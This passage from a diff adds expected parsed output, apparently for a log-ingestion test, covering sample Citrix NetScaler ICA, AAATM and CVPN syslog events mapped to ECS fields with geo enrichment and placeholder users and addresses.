client_cookie: xyz123 - flags 12345 - session_setup_time 2023-04-05T12:34:56Z - client_ip 1.128.0.0 - client_type 2 - client_launcher 1 - client_version 1.0.0 - client_hostname client1 - domain_name example.com - server_name ServerA - connection_priority 5 - access_type 1 - status 1 - username user1", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ], + "user": [ + "user1" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com", + "name": "user1" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50" + }, + "facility": "local0", + "host": "ns1", + "name": "CHANNEL_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "channel_id_1": 1, + "channel_id_1_val": 10, + "channel_id_2": 2, + "channel_id_2_val": 20, + "channel_id_3": 3, + "channel_id_3_val": 30, + "channel_id_4": 4, + "channel_id_4_val": 40, + "channel_id_5": 5, + "channel_id_5_val": 50, + "channel_update": { + "begin": "2023-04-05T12:35:00Z", + "end": "2023-04-05T12:35:59Z" + }, + "client_cookie": "abc456", + "device_serial_number": "1002", + "flags": "67890", + "message": "session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "session_guid": "DEF456" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA CHANNEL_UPDATE 4471 0 : session_guid DEF456 - device_serial_number 1002 - client_cookie abc456 - flags 67890 - channel_update_begin 2023-04-05T12:35:00Z - channel_update_end 2023-04-05T12:35:59Z - channel_id_1 1 - channel_id_1_val 10 - channel_id_2 2 - channel_id_2_val 20 - channel_id_3 3 - channel_id_3_val 30 - channel_id_4 4 - channel_id_4_val 40 - channel_id_5 5 - channel_id_5_val 50", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "ghi789", + "connection_priority": "8", + "device_serial_number": "1003", + "flags": "13579", + "message": "session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "nsica_session": { + "acr_count": 1, + "client": { + "ip": "1.128.0.0", + "port": 12345 + }, + "reconnect_count": 3, + "server": { + "ip": "1.128.0.0", + "port": 54321 + }, + "status": "2" + }, + "session_guid": "GHI789", + "timestamp": "2022-09-27T18:00:00.000Z" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 54321 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_UPDATE 4471 0 : session_guid GHI789 - device_serial_number 1003 - client_cookie ghi789 - flags 13579 - nsica_session_status 2 - nsica_session_client_ip 1.128.0.0 - nsica_session_client_port 12345 - nsica_session_server_ip 1.128.0.0 - nsica_session_server_port 54321 - nsica_session_reconnect_count 3 - nsica_session_acr_count 1 - connection_priority 8 - timestamp 2022-09-27T18:00:00.000 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -" + }, + "facility": "local0", + "host": "ns1", + "name": "L7_LATENCY_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "jkl012", + "device_serial_number": "1004", + "flags": "24680", + "l7_latency": { + "max_notify_count": 5, + "notify_interval": 30, + "threshold_factor": 2, + "waittime": "1970-01-01T00:01:40.000Z" + }, + "l7_threshold_breach": { + "avg_clientside_latency": 120, + "avg_serverside_latency": 80, + "max_clientside_latency": 150, + "max_serverside_latency": 100 + }, + "message": "session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "min_l7_latency": 60, + "nsica_status": "3", + "session_guid": "JKL012" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA L7_LATENCY_UPDATE 4471 0 : session_guid JKL012 - device_serial_number 1004 - client_cookie jkl012 - flags 24680 - nsica_status 3 - L7LatencyThresholdFactor 2 - L7LatencyWaittime 100 - L7LatencyNotifyInterval 30 - L7LatencyMaxNotifyCount 5 - L7ThresholdBreachAvgClientsideLatency 120 - L7ThresholdBreachMaxClientsideLatency 150 - L7ThresholdBreachAvgServersideLatency 80 - L7ThresholdBreachMaxServersideLatency 100 - MinL7Latency 60 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "mno345", + "device_serial_number": "1005", + "flags": "54321", + "message": "session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "session_end_time": "2023-04-05T12:37:00Z", + "session_guid": "MNO345" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA SESSION_TERMINATE 4471 0 : session_guid MNO345 - device_serial_number 1005 - client_cookie mno345 - flags 54321 - session_end_time 2023-04-05T12:37:00Z", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3" + }, + "facility": "local0", + "host": "ns1", + "name": "NETWORK_UPDATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_cookie": "pqr678", + "clientside": { + "jitter": 2, + "packet_retransmits": 5, + "rtt": "130", + "rxbytes": 1500, + "txbytes": 2000 + }, + "device_serial_number": "1006", + "flags": "98765", + "ica_rtt": "120", + "message": "session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "serverside": { + "jitter": 3, + "packet_retransmits": 3, + "rtt": "140" + }, + "session_guid": "PQR678" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1500 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA NETWORK_UPDATE 4471 0 : session_guid PQR678 - device_serial_number 1006 - client_cookie pqr678 - flags 98765 - ica_rtt 120 - clientside_rxbytes 1500 - clientside_txbytes 2000 - clientside_packet_retransmits 5 - serverside_packet_retransmits 3 - clientside_rtt 130 - serverside_rtt 140 - clientside_jitter 2 - serverside_jitter 3", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "source": { + "bytes": 2000 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp" + }, + "facility": "local0", + "host": "ns1", + "name": "APPLICATION_LAUNCH", + "priority": "info" + }, + "citrix_adc": { + "log": { + "app": { + "launch_time": "2023-04-05T12:38:00Z", + "name": "ExampleApp", + "process_id": 9876 + }, + "client_cookie": "stu901", + "device_serial_number": "1007", + "flags": "112233", + "launch_mechanism": "1", + "message": "session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "module_path": "C:/Program Files/ExampleApp", + "session_guid": "STU901", + "startup_duration": 45 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_LAUNCH 4471 0 : session_guid STU901 - device_serial_number 1007 - client_cookie stu901 - flags 112233 - startup_duration 45 - launch_mechanism 1 - app_launch_time 2023-04-05T12:38:00Z - app_process_id 9876 - app_name ExampleApp - module_path C:/Program Files/ExampleApp", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "device_event_class_id": "ICA", + "extended": { + "message": "session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z" + }, + "facility": "local0", + "host": "ns1", + "name": "APPLICATION_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "app": { + "process_id": 9877, + "termination_time": "2023-04-05T12:39:00Z", + "termination_type": "0" + }, + "client_cookie": "vwx234", + "device_serial_number": "1008", + "flags": "445566", + "message": "session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "session_guid": "VWX234" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ICA APPLICATION_TERMINATE 4471 0 : session_guid VWX234 - device_serial_number 1008 - client_cookie vwx234 - flags 445566 - app_termination_type 0 - app_process_id 9877 - app_termination_time 2023-04-05T12:39:00Z", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGIN", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser_type": "Firefox", + "client_ip": "1.128.0.0", + "groups": "Admin,IT", + "message": "User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "nat": { + "ip": "1.128.0.0" + }, + "user": "Alice", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGIN 4471 0 : User Alice - Client_ip 1.128.0.0 - Nat_ip 1.128.0.0 - Vserver 1.128.0.0:443 - Browser_type \"Firefox\" - Group(s) \"Admin,IT\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Admin,IT" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0" + ], + "user": [ + "Alice" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "nat": { + "ip": "1.128.0.0" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "Alice" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "compression_ratio_recieved": 35.0, + "compression_ratio_send": 50.0, + "duration": "00:00:04", + "end_time": "2023-04-04T09:30:00.000Z", + "groups": "HR,Finance", + "http_resources_accessed": "20", + "logout_method": "UserInitiated", + "message": "User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "nat": { + "ip": "10.0.0.2" + }, + "start_time": "2023-04-04T08:30:00.000Z", + "total_bytes_received": 50, + "total_bytes_send": 3, + "total_compressed_bytes_recieved": 500, + "total_compressed_bytes_send": 1, + "total_policies_allowed": 45, + "total_policies_denied": 5, + "total_tcp_connections": 50, + "user": "Bob", + "vserver": { + "ip": "10.0.0.2", + "port": 10443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "destination": { + "bytes": 50 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-04T09:30:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM LOGOUT 4471 0 : User Bob - Client_ip 1.128.0.0 - Nat_ip 10.0.0.2 - Vserver 10.0.0.2:10443 - Start_time \"2023-04-04T08:30:00Z\" - End_time \"2023-04-04T09:30:00Z\" - Duration 00:00:04 - Http_resources_accessed 20 - Total_TCP_connections 50 - Total_policies_allowed 45 - Total_policies_denied 5 - Total_bytes_send 3 - Total_bytes_recv 50 - Total_compressedbytes_send 1 - Total_compressedbytes_recv 500 - Compression_ratio_send 50.00% - Compression_ratio_recv 35.00% - LogoutMethod \"UserInitiated\" - Group(s) \"HR,Finance\"", + "severity": 0, + "start": "2023-04-04T08:30:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "HR,Finance" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.2", + "1.128.0.0" + ], + "user": [ + "Bob" + ] + }, + "server": { + "ip": "10.0.0.2", + "port": 10443 + }, + "source": { + "bytes": 3, + "nat": { + "ip": "10.0.0.2" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "Bob" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"AccessRestriction\"", + "device_event_class_id": "AAATM", + "extended": { + "message": "- Denied_by_policy \"AccessRestriction\"" + }, + "facility": "local0", + "host": "ns1", + "name": "HTTP_RESOURCEACCESS_DENIED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"AccessRestriction\"", + "policy_violation": "AccessRestriction" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : AAATM HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"AccessRestriction\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page", + "device_event_class_id": "CVPN", + "extended": { + "message": "HTML_URL https://example.com/page" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_INPUT_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "html_url": "https://example.com/page", + "message": "HTML_URL https://example.com/page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_INPUT_URL 4471 0 : HTML_URL https://example.com/page", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.com", + "original": "https://example.com/page", + "path": "/page", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CVPN CVPN_REWRITTEN_URL 4471 0 : REWRITTEN_URL https://example.com/proxy?url=page", + "device_event_class_id": "CVPN", + "extended": { + "message": "REWRITTEN_URL https://example.com/proxy?url=page" + }, + "facility": "local0", + "host": "ns1", + "name": "CVPN_REWRITTEN_URL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "REWRITTEN_URL https://example.com/proxy?url=page", + "rewritten_url": "https://example.com/proxy?url=page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 